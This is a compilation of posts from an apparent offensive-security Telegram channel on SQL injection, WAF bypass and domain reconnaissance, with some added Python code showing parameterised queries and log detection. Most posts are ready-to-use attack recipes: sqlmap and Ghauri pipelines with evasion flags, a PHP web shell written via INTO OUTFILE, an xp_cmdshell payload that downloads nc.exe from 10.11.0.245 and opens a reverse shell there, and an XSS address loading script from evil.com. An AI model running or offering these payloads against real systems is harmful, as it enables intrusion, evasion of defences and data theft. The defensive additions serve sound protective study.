ExploitQuest
Method for finding SQLi vulnerabilities:

Command Line Tools Like a Pro

1. sublist3r -d target | tee -a domains.txt

2. cat domains.txt | httpx | tee -a alive.txt

3. cat alive.txt | waybackurls | tee -a urls.txt

4. cat urls.txt | gf sqli >> sqli.txt

5. sqlmap -m sqli.txt --dbs --batch --level 3 --risk 2 --time-sec 10 --random-agent

#sqli #sql
💭 Union based:

Look, when you make a request to a URL that touches SQL, there are three kinds of response:

1- An answer is returned to you
(for example, when buying from a bookstore, it tells you how many copies of the book are available)

2- A result derived from the answer is returned to you
(in the same example, instead of telling you the number, it only tells you whether the book is available or not)

3- No result comes back to you
(for example, you sent a GET or POST request and the website now asks you to allow it to save your IP, cookie, user agent, etc., otherwise you will not be allowed to work with the site)

How do we know if we have a union?
If the URL is:

https://site.com?news=22

one of the following queries is sent to the database:

select * from news where news_id = $newsid;

select * from news where news_id = '$newsid';

select * from news where news_id = "$newsid";
Now, to determine if there is Union or not, we have:

With order by, you can work out the number of columns the query returns.

Default request:

page/?id=54

Test 1:

page/?id=54 order by 1
page/?id=54' order by 1 #
page/?id=54" order by 1 #

Test 2:

page/?id=54 order by 1000
page/?id=54' order by 1000#
page/?id=54" order by 1000#

Above, if

Default == Test 1

and also

Test 1 != Test 2

we understand that we have Union (:

Now how to extract the information? The first step is to get the number of columns, and we can find it as follows:

page/?id=54 order by 1 #   (same as default request)
page/?id=54 order by 2 #   (same as default request)
page/?id=54 order by 3 #   (same as default request)
page/?id=54 order by 4 #   (not the same as default)

So we understand that we have 3 columns. Now with:

page/?id=54 union select 1,2,3 #

we can find the column that is returned to us and run our own payloads in it to get data (the union must select exactly as many columns as the count found above).

For example, to get the database name (if it is the third column that is returned):

page/?id=54 union select 1,2,database()#

To get the tables of a database:

page/?id=54 UNION SELECT table_name FROM information_schema.tables WHERE table_schema = 'your_database_name' --

To get the columns of a table in that database:

UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'your_table_name' AND table_schema = 'your_database_name' --

And to get the data in a column:

UNION SELECT your_column_name FROM your_table_name LIMIT 1 OFFSET 0 --

#SQLI
πŸ‘2
❀4😁2
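Why the ORDER BY walk above works, and what makes it stop working, as an added example that is not part of the original post: the `select * from news where news_id = $newsid` query built by string interpolation beside the same query with a bound parameter, both run against a constructed in-memory SQLite table. The table, its rows and the function names are this example's own assumptions; the `#` comment the post appends is MySQL syntax and is left off here because SQLite does not use it.

```python
import sqlite3


def make_db():
    """Constructed sample data (not from the post): a 3-column news table like
    the one the post's walk-through assumes."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (news_id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (22, 'Launch day', 'We shipped.');
        INSERT INTO news VALUES (23, 'Patch notes', 'Bugs fixed.');
    """)
    return db


def fetch_news_unsafe(db, newsid):
    """The post's `news_id = $newsid` built by string interpolation: whatever
    arrives in ?news= becomes part of the SQL text the engine parses."""
    return db.execute(f"SELECT * FROM news WHERE news_id = {newsid}").fetchall()


def fetch_news_safe(db, newsid):
    """Same query with the value bound as a parameter. The engine never parses
    the value as SQL, so 'order by' and 'union' are just characters in a string
    that matches no news_id."""
    return db.execute("SELECT * FROM news WHERE news_id = ?", (newsid,)).fetchall()


def response_class(fetch, db, newsid):
    """Collapse a probe to the three observable outcomes the post compares:
    'same' as the default page, 'different', or an 'error'."""
    baseline = fetch(db, "22")
    try:
        rows = fetch(db, newsid)
    except sqlite3.OperationalError:
        return "error"
    return "same" if rows == baseline else "different"


def column_count(fetch, db, max_cols=16):
    """The post's ORDER BY walk: the first n for which `order by n` stops
    behaving like the default request is one past the column count.
    Returns 0 when even `order by 1` changes the response, i.e. the input is
    not reaching the SQL parser at all (the parameterised case)."""
    for n in range(1, max_cols + 1):
        if response_class(fetch, db, f"22 order by {n}") != "same":
            return n - 1
    return None


def union_marker(fetch, db):
    """`union select 1,2,3` from the post: with the unsafe query the extra row
    lands in the result set (so one of 1/2/3 ends up rendered on the page);
    with the bound parameter nothing matches at all."""
    try:
        return fetch(db, "22 union select 1,2,3")
    except sqlite3.OperationalError:
        return []


if __name__ == "__main__":
    db = make_db()
    for name, fetch in (("interpolated", fetch_news_unsafe), ("parameterised", fetch_news_safe)):
        print(name, "columns found by ORDER BY walk:", column_count(fetch, db))
        print(name, "union select 1,2,3 result:", union_marker(fetch, db))
```

The interpolated version reports 3 columns and shows the `(1, 2, 3)` marker row; the parameterised version answers every probe with an empty result, which is the behaviour a defender wants to see when replaying these requests against their own application.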
💻 Disclosed vulnerabilities with bug bounty

1️⃣ Account takeover via Self-XSS
An example of how additional functionality can be used to squeeze a one-click account takeover out of an otherwise useless Self-XSS. See the report for more details.

2️⃣ SQL injection in POST request
Identification and exploitation of a Union-based SQL injection in a POST request, based on the server's responses. More information about exploiting such vulnerabilities here.

3️⃣ OTP Bypass
Bypassing OTP confirmation by manipulating the server response. I told you about such bugs here.

#web #xss #sqli
💉 About bypassing protection against SQL injections

Often the WAF on a site stifles every attempt at SQL injection and will not even let you insert a quotation mark and the usual payload; however, with some clever manipulation it is still often possible to bypass it.

For example, by adding control characters like %00, %0A, etc., or by inserting mathematical operations

( 'AND'1'=1*1 instead of 'AND'1'='1' )

or by adding MySQL version-specific comments like

/*!50000%55nIoN*/ /*!50000%53eLeCt*/

and much more.

For more examples, you can check out this repository, which shows bypass options for different situations, and I highly recommend this site.

https://websec.ca/kb/sql_injection

https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet/

#web #sqli #bypass #waf
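The same evasions seen from the log side, as an added example that is not part of the original post: a small detector that first undoes URL encoding, `/*!50000 ... */` versioned comments, `/**/` used as whitespace, mixed case and %00/%0A padding, and only then matches a handful of plain patterns. It is run over constructed access-log lines; the log lines, rule names and patterns are assumptions of this example rather than anything from the channel, and the normalisation step is also what makes the sqlmap tamper scripts named elsewhere on this page (space2comment, randomcase, charencode) visible to the rules.

```python
import re
from urllib.parse import unquote_plus

# Rules run against the *normalized* request target, so they can stay plain.
RULES = {
    "union-select":   re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b"),
    "order-by-probe": re.compile(r"\border\s+by\s+\d+"),
    "time-based":     re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b"),
    "file-write":     re.compile(r"\binto\s+(?:out|dump)file\b"),
    "os-command":     re.compile(r"\bxp_cmdshell\b"),
    "schema-enum":    re.compile(r"\binformation_schema\b"),
    "tautology":      re.compile(r"\b(?:or|and)\b\s*['\"]?\s*\d+\s*['\"]?\s*=\s*['\"]?\s*\d+"),
}
VERSIONED_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)  # /*!50000UnIoN*/ -> UnIoN
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)                # /**/ -> one space
REQUEST_TARGET = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD|PATCH|OPTIONS) (\S+) HTTP/[\d.]+"')

# Constructed sample log in Common Log Format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2025:10:01:02 +0000] "GET /news?news=22 HTTP/1.1" 200 5120
203.0.113.7 - - [10/May/2025:10:01:09 +0000] "GET /news?news=22%20order%20by%204 HTTP/1.1" 500 312
203.0.113.7 - - [10/May/2025:10:01:15 +0000] "GET /news?news=22/**/UnIoN/**/SeLeCt/**/1,2,database() HTTP/1.1" 200 5200
203.0.113.7 - - [10/May/2025:10:01:21 +0000] "GET /news?news=22%27%20/*!50000%55nIoN*/%20/*!50000%53eLeCt*/%201,2,3%23 HTTP/1.1" 200 5200
203.0.113.7 - - [10/May/2025:10:01:30 +0000] "GET /page?id=1%27%20AND%20SLEEP(5)%20--%20- HTTP/1.1" 200 4100
198.51.100.3 - - [10/May/2025:10:02:00 +0000] "GET /search?q=trade+union+history HTTP/1.1" 200 7300
203.0.113.7 - - [10/May/2025:10:02:10 +0000] "GET /item?id=1000%27;exec%20master.dbo.xp_cmdshell%20%27whoami%27;-- HTTP/1.1" 200 900
"""


def normalize(target):
    """Undo the encodings and comment tricks so that the rules see plain SQL."""
    s = unquote_plus(unquote_plus(target))  # twice: also catches %2527-style double encoding
    s = VERSIONED_COMMENT.sub(r" \1 ", s)   # keep the keyword hidden in a versioned comment
    s = PLAIN_COMMENT.sub(" ", s)           # /**/ standing in for a space
    s = s.replace("\x00", " ")              # %00 padding
    s = re.sub(r"\s+", " ", s)              # %0A, tabs and runs of spaces -> one space
    return s.lower()                        # defeats random casing


def classify(target):
    """Names of the rules the request target trips, in RULES order."""
    norm = normalize(target)
    return [name for name, rx in RULES.items() if rx.search(norm)]


def scan_log(lines):
    """(request target, matched rules) for every request that trips at least one rule."""
    hits = []
    for line in lines:
        m = REQUEST_TARGET.search(line)
        if not m:
            continue
        rules = classify(m.group(1))
        if rules:
            hits.append((m.group(1), rules))
    return hits


if __name__ == "__main__":
    for target, rules in scan_log(SAMPLE_LOG.splitlines()):
        print(", ".join(rules).ljust(16), target)
```

Five of the seven constructed lines are flagged; the search for "trade union history" is not, because the rules require the keyword pair rather than a single word. The normalisation is deliberately more aggressive than a WAF would dare to be inline, which is fine for after-the-fact log review where a false positive costs an analyst a glance rather than a blocked customer.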
💉 Transition from SQL injection to shell or backdoor

▫️Use "into outfile" to write a file:

' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #

▫️Capture the request in Burp Proxy, save it to a file named post-request, then run sqlmap:

sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10

▫️Reverse netcat shell via MSSQL injection when xp_cmdshell is available:

1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--

#web #sqli
After exploiting SQL injection using the following email address

"'-sleep(5)-'"@mail.local

you can't help but wonder: why the hell did this even get through as a valid email?

In general, the local part of an email (the login, before the @) may contain special characters according to the RFC if it is enclosed in double quotes. And then our beloved programming languages deviate a little in which characters they actually allow.

So, the next bit of magic:

php -r "echo filter_var('\"\'--><script/src=//evil.com></script>\"@example.com', FILTER_VALIDATE_EMAIL);"

will validate and legitimately return an email carrying the attack vector:

"'--><script/src=//evil.com></script>"@example.com

And how the developers display it further is a separate question.

#sqli
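What a stricter validator looks like, and why validation alone would still not have saved the query, as an added example that is not part of the original post: an email check that accepts only the RFC 5322 dot-atom form of the local part (so the quoted-string addresses above are refused), next to a lookup that binds the address as a parameter. The user table, its rows and the function names are constructed for this example; the regexes are this example's reading of RFC 5322 "atext", not PHP's filter_var.

```python
import re
import sqlite3

# RFC 5322 "atext" characters. Note that the apostrophe is one of them, so even
# a strict validator will pass addresses that carry a quote into the query.
ATEXT = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]"
DOT_ATOM_LOCAL = re.compile(rf"^{ATEXT}+(?:\.{ATEXT}+)*$")
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
DOTTED_DOMAIN = re.compile(rf"^(?:{LABEL}\.)+{LABEL}$")


def is_acceptable_email(addr):
    """Accept only a dot-atom local part and a dotted hostname. Quoted local
    parts ("...") are RFC-legal but refused here: that is exactly the form the
    post's sleep() and <script> addresses rely on."""
    if len(addr) > 254 or addr.count("@") != 1:
        return False
    local, domain = addr.split("@")
    if not 0 < len(local) <= 64 or not DOT_ATOM_LOCAL.match(local):
        return False
    return bool(DOTTED_DOMAIN.match(domain))


def make_user_db():
    """Constructed sample data (not from the post)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, email TEXT);
        INSERT INTO users VALUES (1, 'alice@example.com');
        INSERT INTO users VALUES (2, 'bob@example.com');
    """)
    return db


def find_user_unsafe(db, email):
    """Address pasted into the SQL text: an address that passes the validator
    can still close the quote and append its own condition."""
    return db.execute(f"SELECT id, email FROM users WHERE email = '{email}'").fetchall()


def find_user(db, email):
    """Validate the shape, then bind the value; the apostrophes stay data."""
    if not is_acceptable_email(email):
        return []
    return db.execute("SELECT id, email FROM users WHERE email = ?", (email,)).fetchall()


if __name__ == "__main__":
    db = make_user_db()
    for addr in ("alice@example.com", "\"'-sleep(5)-'\"@mail.local", "'OR'1'='1'--@example.com"):
        print(repr(addr), "valid:", is_acceptable_email(addr),
              "unsafe rows:", len(find_user_unsafe(db, addr)),
              "bound rows:", len(find_user(db, addr)))
```

The third address is the instructive one: it contains nothing but atext characters, so any RFC-faithful validator accepts it, yet pasted into the query it reads `email = '' OR '1'='1' --...` and returns every user. Rejecting the quoted form closes the door the post walked through; binding the parameter is what actually keeps the query intact.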
💉 Find SQL injection on the site with one command

As always, a set of commands is used for this purpose.

Findomain collects the domains of the site being tested.

Httpx checks their availability.

Waybackurls retrieves all URLs that the Wayback Machine knows about for the identified live subdomains.

Anew removes duplicate lines before passing them on.

Now we use gf to filter out URLs that match patterns with potential SQL injection (don't forget to install gf-patterns as well).

Finally, we run sqlmap on all identified potentially vulnerable URLs.

findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent

#web #sqli
SQL injection bypassing Cloudflare

When testing a site, you can bypass Cloudflare's SQL injection protection using sqlmap and a combination of the

space2comment,between,randomcase

tamper scripts.

#web #sqli
Finding SQL Injection Vulnerabilities in Multiple Ways with Examples + Achieving RCE via SQLi

SQL Injection (SQLi) is one of the most critical web vulnerabilities, allowing an attacker to manipulate database queries, extract sensitive data, modify records, or even execute system commands (RCE - Remote Code Execution).

This article will explore multiple ways to detect SQLi vulnerabilities with practical examples and then demonstrate how SQLi can lead to RCE.

━━━━━━━━━━━━━━━━━━

1. Discovering SQL Injection Vulnerabilities in Multiple Ways



🔹Method 1: Manual Testing with Special Characters

The simplest way to test for SQL Injection is by inserting special characters such as:

'
"
--
#
;

Example 1: Injecting a Single Quote

'

If a website has a login page like:

https://example.com/login.php?user=admin

try entering:

https://example.com/login.php?user=admin'

If an error appears like:

You have an error in your SQL syntax...

it indicates an SQL Injection vulnerability.


━━━━━━━━━━━━━━━━━━

🔹Method 2: Injecting Simple SQL Queries

If the backend SQL query looks like this:

SELECT * FROM users WHERE username = '$user' AND password = '$pass'

you can try the following payloads in the username field:

admin' --

or

' OR '1'='1' --

If you gain access without entering a password, the application is vulnerable.


━━━━━━━━━━━━━━━━━━

🔹 Method 3: Using SQLMap for Automated Testing

SQLMap is a powerful tool for automated SQL Injection detection. Run:

sqlmap -u "https://example.com/login.php?user=admin" --dbs

SQLMap will analyze the URL and extract the database names if it is vulnerable.


━━━━━━━━━━━━━━━━━━

🔹Method 4: Testing with SQL Sleep (Time-Based SQLi)

If error messages are hidden, you can test for Time-Based SQLi:

https://example.com/page?id=1' AND SLEEP(5) --

If the page takes 5 seconds to load, the database is likely vulnerable.


━━━━━━━━━━━━━━━━━━

🔹Method 5: Data Extraction via UNION-Based SQL Injection

If a website displays data from a database, try injecting a UNION SELECT query:

https://example.com/page?id=1 UNION SELECT 1,2,3,4 --

If the numbers or unexpected data appear on the page, the website is vulnerable.


━━━━━━━━━━━━━━━━━━


2. Escalating SQL Injection to RCE (Remote Code Execution)

If the SQL Injection allows file operations via LOAD_FILE() or INTO OUTFILE, you can execute commands on the server. On MySQL this requires the FILE privilege and a destination under secure_file_priv, which is why withholding FILE from the application's database user and setting secure_file_priv is the standard hardening against it.

🔹Example: Uploading a Web Shell via SQLi

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';

Now access the shell through:

http://target.com/shell.php?cmd=whoami

🔹If SQL Server has xp_cmdshell enabled (it is disabled by default), execute system commands like:

EXEC xp_cmdshell 'whoami';

This will return the current system user running the database service.


━━━━━━━━━━━━━━━━━━

3. Exploiting SQL Injection to Gain Admin Access

In some cases, SQLi can be used to escalate privileges by modifying account or session data:

UPDATE users SET is_admin = 1 WHERE username = 'victim';

Or steal an admin session:

SELECT session_id FROM users WHERE username = 'admin';


💡 Conclusion

•Test manually using ' and OR 1=1

•Use SQLMap for automatic SQLi detection

•Escalate SQLi to RCE if the system allows file operations

•Test SQL Sleep (Time-Based Injection) when errors are hidden

•Use UNION SELECT to extract sensitive data


━━━━━━━━━━━━━━━━━━

🚀 Join now

[https://t.me/ExploitQuest]

#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE #Malware #ReverseEngineering
CORS one liner command exploiter

This is an extremely helpful and practical cheatsheet for bug hunters, which helps you find CORS misconfigurations with every possible method. Simply replace https://example.com with the URL you want to target. This will help you scan for CORS vulnerabilities without the need for an external tool. All you have to do is copy and paste the commands into your terminal and keep your fingers crossed for a possible CORS issue.

Github

#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
Changing HTTP Request Methods and Their Security Impact

When we send a GET request to a website like site.com, we usually receive an HTML page or another expected response.

But what happens if we change the request method to POST, PUT, or DELETE?

This can lead to different reactions from the server, such as:

1-Rejecting the request and returning 405 Method Not Allowed.

2-Processing the request in an unexpected way, potentially causing errors or data leaks.

3-In rare cases, this can lead to severe security vulnerabilities, such as Remote Code Execution (RCE).


━━━━━━━━━━━━━━━━━━

Impact on Web Frameworks (e.g., Laravel)

Some web frameworks, like Laravel, return sensitive information when an error occurs, especially if debug mode is enabled. Changing the request method unexpectedly may trigger errors that expose:

•Database credentials.

•Environment variables.

•File paths and internal configurations.

In some cases, improper handling of user input can even lead to RCE vulnerabilities, allowing an attacker to execute commands on the server.

━━━━━━━━━━━━━━━━━━

Practical Examples

Example 1: 405 Error When Changing Method

Trying to send a POST request to an endpoint that only allows GET:

curl -X POST http://example.com/

The server might respond with:

HTTP/1.1 405 Method Not Allowed

Example 2: Internal Error Due to Unexpected Request

If a server encounters an error when processing an unexpected request method, it might return:

HTTP/1.1 500 Internal Server Error

In Laravel, if APP_DEBUG=true, it might expose sensitive details like:

SQLSTATE[HY000] [1045] Access denied for user 'root'@'localhost'

This could reveal database credentials or configuration files.

Example 3: RCE Exploitation in Laravel

If an application passes unsanitized user input to eval() or system(), an attacker may be able to execute system commands by altering the request:

curl -X DELETE http://example.com/delete_user --data "id=1; system('whoami');"

If the server is not properly filtering input, it may execute the whoami command and return the server's user name.

#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
A Simple Yet Effective Way to Find SQLI Vulnerabilities

Sometimes, simple methods work best when hunting for SQL injection (SQLI) vulnerabilities. Here's an optimized approach:

1. Extract Potential Targets
Use Wayback Machine URLs to find historical URLs with parameters:

waybackurls --dates target.com | grep '?id='

This helps identify pages that may still be vulnerable.


━━━━━━━━━━━━━━━━━━

2. Test for Sleep-Based SQLI
Use the following payload:

if(now()=sysdate(),SLEEP(8),0)

If the response is delayed by ~8 seconds, the parameter is likely injectable.

━━━━━━━━━━━━━━━━━━

3. Manual Testing with cURL

curl -G "https://target.com/page.php" --data-urlencode "id=1' OR if(now()=sysdate(),SLEEP(8),0) -- -" -H "X-Forwarded-For: 127.0.0.1"

-G sends the --data-urlencode value as the query string, so the payload lands in the id parameter that the page reads; with -X GET and a request body it would only travel in the body and never reach $_GET['id'].

•The X-Forwarded-For header may help bypass basic IP-based WAF restrictions.

•Modify headers like User-Agent to mimic real traffic.


━━━━━━━━━━━━━━━━━━

4. Automated Testing with Ghauri (Bypassing WAFs)

ghauri -u "https://target.com/page.php?id=1" --timeout=30 --delay=5 --technique=BEST --level=3 --prefix="/**/" --suffix="-- -" --safe-chars="[]" --random-agent --ignore-code=403

--timeout=30: Sets the request timeout to 30 seconds.

--delay=5: Adds a 5-second delay between requests to avoid detection.

--technique=BEST: Enables the boolean-based (B), error-based (E), stacked-query (S) and time-based (T) techniques.

--level=3: Performs more advanced tests for better detection.

--prefix="/**/": Adds a comment prefix to bypass WAF filters.

--suffix="-- -": Ends the payload with a SQL comment so the remainder of the original query is ignored.

--safe-chars="[]": Prevents the listed characters from being URL-encoded.

--random-agent: Uses a random User-Agent to avoid fingerprinting.

--ignore-code=403: Ignores 403 Forbidden responses to continue scanning.



━━━━━━━━━━━━━━━━━━

5. Advanced Testing with SQLMap

sqlmap -u "https://target.com/page.php?id=1" --batch --random-agent --tamper="between,space2comment,charencode" --timeout=15 --time-sec=8 --level=5 --risk=3

--random-agent: Uses random user-agents to avoid detection.

--tamper: Applies obfuscation techniques to evade WAFs.

--risk=3 --level=5: Enables deep scanning with advanced payloads.



━━━━━━━━━━━━━━━━━━

Conclusion

✅ Wayback Machine helps find old endpoints.

✅ Manual payloads help confirm basic SQL injection.

✅ Ghauri & SQLMap provide automation with WAF bypass techniques.

━━━━━━━━━━━━━━━━━━

[https://t.me/ExploitQuest]

#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypass
These commands and URLs are used for gathering and analyzing data about a specific domain (example.com in this case).
The goal is to identify exposed files, sensitive information, and security-related data. Here's a breakdown:

1️⃣ Using Archive.org to Find Archived URLs
URL:

https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original

Explanation:

•This query retrieves all archived URLs of example.com from the Wayback Machine.

•*.example.com/* searches all subdomains and pages.

•collapse=urlkey removes duplicate URLs.

•output=text formats the output as plain text.

•fl=original returns only the original URLs without extra metadata.



━━━━━━━━━━━━━━━━━━

2️⃣ Using VirusTotal to Get a Domain Report
URL:

https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=example.com

Explanation:

•Retrieves a security report for example.com from VirusTotal.

•This report includes:
Blacklist status
Malicious activities detected
Known associated malicious URLs

•Replace YOUR_API_KEY with a valid VirusTotal API key.




━━━━━━━━━━━━━━━━━━


3️⃣ Using AlienVault OTX to Fetch URLs Related to a Domain
URL:

https://otx.alienvault.com/api/v1/indicators/hostname/domain.com/url_list?limit=500&page=1

Explanation:

•Queries AlienVault OTX for URLs associated with domain.com.

•limit=500 retrieves up to 500 URLs per page.

•page=1 fetches the first page of results.



━━━━━━━━━━━━━━━━━━

4️⃣ Using curl to Fetch Archived URLs and Save Them to a File
Command:

curl -G "https://web.archive.org/cdx/search/cdx" \
--data-urlencode "url=*.example.com/*" \
--data-urlencode "collapse=urlkey" \
--data-urlencode "output=text" \
--data-urlencode "fl=original" > out.txt

Explanation:

•Fetches all archived URLs of example.com from the Wayback Machine.

•Saves the output to out.txt for further processing.




━━━━━━━━━━━━━━━━━━

5️⃣ Extracting Sensitive Files Using uro and grep
Command:

cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'

Explanation:

1-cat out.txt → Reads the archived URLs from out.txt.

2-uro → Deduplicates and normalizes URLs.

3-grep -E → Uses regular expressions (regex) to pick out potentially sensitive files, such as:

•Database files: .sql, .db, .backup
•Documents: .xls, .xlsx, .doc, .pdf, .txt
•Compressed archives: .zip, .tar.gz, .rar, .7z
•Encryption keys: .pem, .crt, .key, .asc
•Configuration files: .config, .ini, .yaml, .yml
•Executable files: .exe, .dll, .apk, .msi

Note that the pattern is unanchored, so it also matches inside longer names and inside query strings (\.sh matches index.shtml, \.sql matches app.js?v=.sql), so expect to review the hits by hand.




━━━━━━━━━━━━━━━━━━


πŸ” Summary:

These commands help in discovering and analyzing sensitive files that might be publicly accessible by:

1-Fetching archived URLs from Wayback Machine.

2-Checking for malicious activity on VirusTotal and AlienVault.

3-Filtering sensitive files using grep and uro.



[https://t.me/ExploitQuest]

#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
❀6πŸ‘5
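A tighter version of step 5, as an added example that is not part of the original post: the same extension list, but matched only against the final path segment of each URL (so `index.shtml` and `app.js?v=.sql` no longer count), with `.tar.gz` preferred over `.gz`, and a rough stand-in for uro's dedupe keyed on scheme, host and path. The category grouping, sample out.txt contents and function names are this example's own assumptions; the sample URLs are constructed and point at example.com.

```python
import posixpath
from urllib.parse import urlsplit

# Same extensions as the grep above, grouped by what a defender would triage first.
CATEGORIES = {
    "database":     (".sql", ".db", ".backup", ".bak"),
    "document":     (".xls", ".xlsx", ".doc", ".docx", ".pptx", ".pdf", ".txt", ".csv", ".md"),
    "archive":      (".zip", ".tar.gz", ".tgz", ".tar", ".rar", ".7z", ".gz"),
    "key-material": (".pem", ".crt", ".key", ".pub", ".asc", ".secret"),
    "config":       (".config", ".ini", ".yaml", ".yml", ".json", ".xml"),
    "executable":   (".exe", ".dll", ".apk", ".msi", ".bin", ".bat", ".sh", ".deb", ".rpm"),
    "log-or-temp":  (".log", ".cache", ".tmp"),
}
# Longest extension first so that .tar.gz wins over .gz.
EXTENSIONS = sorted(((ext, cat) for cat, exts in CATEGORIES.items() for ext in exts),
                    key=lambda e: len(e[0]), reverse=True)

# Constructed sample of what out.txt might hold (not real archive data).
SAMPLE_OUT_TXT = """\
http://example.com/backup/db_2019.sql
http://example.com/backup/db_2019.sql?download=1
http://example.com/index.shtml
http://example.com/assets/app.js?v=.sql
http://example.com/exports/users.xlsx
http://example.com/releases/app-1.2.tar.gz
http://example.com/keys/server.key
http://example.com/keywords/page.html
http://example.com/docs/README.md
"""


def classify_url(url):
    """(category, extension) for the URL's last path segment, or None.
    Query string and fragment are ignored; the match is on the whole suffix."""
    name = posixpath.basename(urlsplit(url).path).lower()
    for ext, cat in EXTENSIONS:
        if name.endswith(ext) and len(name) > len(ext):
            return cat, ext
    return None


def triage(urls):
    """Dedupe by scheme+host+path (roughly what uro does), then bucket by category."""
    seen, buckets = set(), {}
    for url in urls:
        url = url.strip()
        if not url:
            continue
        p = urlsplit(url)
        key = (p.scheme, p.netloc.lower(), p.path)
        if key in seen:
            continue
        seen.add(key)
        hit = classify_url(url)
        if hit:
            buckets.setdefault(hit[0], []).append(url)
    return buckets


if __name__ == "__main__":
    for cat, urls in sorted(triage(SAMPLE_OUT_TXT.splitlines()).items()):
        print(cat)
        for u in urls:
            print("   ", u)
```

Run against the constructed list it reports one database dump, one archive, one key file and two documents, and stays silent on the `.shtml` page and on the `.js` asset whose query string merely contains `.sql`; those are the two false positives the grep would have produced.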